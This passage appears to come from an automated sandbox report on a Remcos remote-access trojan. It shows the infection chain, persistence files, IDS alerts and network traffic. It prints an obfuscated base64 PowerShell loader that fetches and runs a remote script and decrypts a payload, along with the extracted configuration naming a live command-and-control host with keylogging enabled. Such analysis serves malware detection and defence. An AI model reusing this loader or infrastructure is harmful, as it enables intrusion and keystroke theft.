kkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNh
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNh

                          Data Obfuscation

                          barindex
                          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1200, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_82916eff.cmd

                          Stealing of Sensitive Information

                          barindex
                          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1200, TargetFilename: C:\ProgramData\remcos\logs.dat
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-02-11T16:43:16.899854+010020365941Malware Command and Control Activity Detected192.168.2.54970537.120.208.4056379TCP
                          2025-02-11T16:43:21.040423+010020365941Malware Command and Control Activity Detected192.168.2.54970837.120.208.4056379TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-02-11T16:43:20.178689+010028033043Unknown Traffic192.168.2.549709178.237.33.5080TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-02-11T16:43:04.195117+010018100002Potentially Bad Traffic192.168.2.549704168.119.145.117443TCP
                          2025-02-11T16:43:19.005122+010018100002Potentially Bad Traffic192.168.2.549706168.119.145.117443TCP
                          2025-02-11T16:43:32.323046+010018100002Potentially Bad Traffic192.168.2.549775168.119.145.117443TCP
                          2025-02-11T16:43:46.400028+010018100002Potentially Bad Traffic192.168.2.549860168.119.145.117443TCP
                          2025-02-11T16:43:59.516625+010018100002Potentially Bad Traffic192.168.2.549940168.119.145.117443TCP
                          2025-02-11T16:44:12.974804+010018100002Potentially Bad Traffic192.168.2.549985168.119.145.117443TCP
                          2025-02-11T16:44:31.040632+010018100002Potentially Bad Traffic192.168.2.549987168.119.145.117443TCP
                          2025-02-11T16:44:44.199139+010018100002Potentially Bad Traffic192.168.2.549988168.119.145.117443TCP
                          2025-02-11T16:44:57.868385+010018100002Potentially Bad Traffic192.168.2.549989168.119.145.117443TCP
                          2025-02-11T16:45:12.613290+010018100002Potentially Bad Traffic192.168.2.549990168.119.145.117443TCP
                          2025-02-11T16:45:30.391651+010018100002Potentially Bad Traffic192.168.2.549991168.119.145.117443TCP
                          2025-02-11T16:45:48.104548+010018100002Potentially Bad Traffic192.168.2.549992168.119.145.117443TCP
                          2025-02-11T16:46:07.080835+010018100002Potentially Bad Traffic192.168.2.549993168.119.145.117443TCP
                          2025-02-11T16:46:25.367970+010018100002Potentially Bad Traffic192.168.2.549994168.119.145.117443TCP
                          2025-02-11T16:46:44.421364+010018100002Potentially Bad Traffic192.168.2.549995168.119.145.117443TCP
                          2025-02-11T16:47:02.682821+010018100002Potentially Bad Traffic192.168.2.549996168.119.145.117443TCP
                          2025-02-11T16:47:18.455794+010018100002Potentially Bad Traffic192.168.2.549997168.119.145.117443TCP
                          2025-02-11T16:47:31.981468+010018100002Potentially Bad Traffic192.168.2.549998168.119.145.117443TCP
                          2025-02-11T16:47:44.848959+010018100002Potentially Bad Traffic192.168.2.549999168.119.145.117443TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: abokirem.duckdns.orgAvira URL Cloud: Label: malware
                          Source: 10.2.powershell.exe.8c21288.2.raw.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": ["abokirem.duckdns.org:56379:1"], "Assigned name": "Aboki", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-J4I3IV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                          Source: Yara matchFile source: 10.2.powershell.exe.8c21288.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.powershell.exe.8c21288.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000022.00000002.2751486587.0000000008A87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2252250805.0000000007437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.3849765879.0000000008920000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3123710586.0000000008723000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000040.00000002.4282483846.0000000008707000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000002.3517844786.0000000008AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3139004207.0000000008EE7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000002.3521971926.0000000008B46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.2740109130.0000000008561000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.2577352879.00000000089BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000045.00000002.4705414625.00000000086A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.2897148363.0000000006D7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000002.3545950157.00000000090E7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.3891764993.0000000009467000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2409566174.0000000007820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.3788098301.000000000769E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2257914268.0000000008CF8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2257239795.0000000008C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.2925202742.0000000008637000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000045.00000002.4640955762.0000000007E6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000040.00000002.4202711770.0000000007E10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000002.3395971094.0000000008E87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2416886326.0000000009047000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.2582377571.0000000008F57000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000002.3369936433.00000000086E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1720, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7980, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5440, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6304, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7240, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6492, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                          Source: powershell.exe, 0000000A.00000002.2257239795.0000000008C20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_0ef9d001-b

                          Exploits

                          barindex
                          Source: Yara matchFile source: 10.2.powershell.exe.8c21288.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.powershell.exe.8c21288.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000002.2257914268.0000000008CF8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2257239795.0000000008C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49704 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49706 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49775 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49860 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49940 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49985 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49987 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49988 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49989 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49990 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49991 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49992 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49993 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49994 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49995 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49996 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49997 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49998 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49999 version: TLS 1.2
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49705 -> 37.120.208.40:56379
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49708 -> 37.120.208.40:56379
                          Source: Malware configuration extractorURLs: abokirem.duckdns.org
                          Source: global trafficTCP traffic: 37.120.208.40 ports 56379,3,5,6,7,9
                          Source: unknownDNS query: name: abokirem.duckdns.org
                          Source: global trafficTCP traffic: 192.168.2.5:49705 -> 37.120.208.40:56379
                          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 37.120.208.40 37.120.208.40
                          Source: Joe Sandbox ViewIP Address: 168.119.145.117 168.119.145.117
                          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49709 -> 178.237.33.50:80
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49706 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49775 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49940 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49985 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49997 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49987 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49990 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49995 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49989 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49994 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49999 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49988 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49991 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49998 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49860 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49993 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49992 -> 168.119.145.117:443
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49996 -> 168.119.145.117:443
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
